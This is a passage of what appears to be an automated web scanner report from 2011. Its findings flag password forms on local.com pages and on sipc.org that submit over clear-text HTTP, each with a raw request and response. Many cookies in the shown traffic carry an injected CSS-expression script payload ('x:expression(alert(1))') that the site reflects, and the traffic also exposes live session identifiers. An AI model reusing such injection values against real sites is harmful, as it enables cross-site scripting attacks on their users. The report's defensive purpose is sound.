SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.29. http://www.local.com/results.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 74200
Date: Thu, 03 Feb 2011 15:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=wu21mu55lor2xjbsdwrsmh45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=1c5b338d-bcdd-44ba-b370-36f6691769b8&expdate=634349085027409460&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:02 GMT; path=/
Content-Length: 74200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.30. http://www.local.com/results/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.31. http://www.local.com/sitemap.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.32. http://www.local.com/sitemap/chicago-il.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.33. http://www.local.com/sitemap/los-angeles-ca.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.34. http://www.local.com/sitemap/new-york-ny.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.35. http://www.local.com/terms/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.36. http://www.local.com/topics/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.37. http://www.sipc.org/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
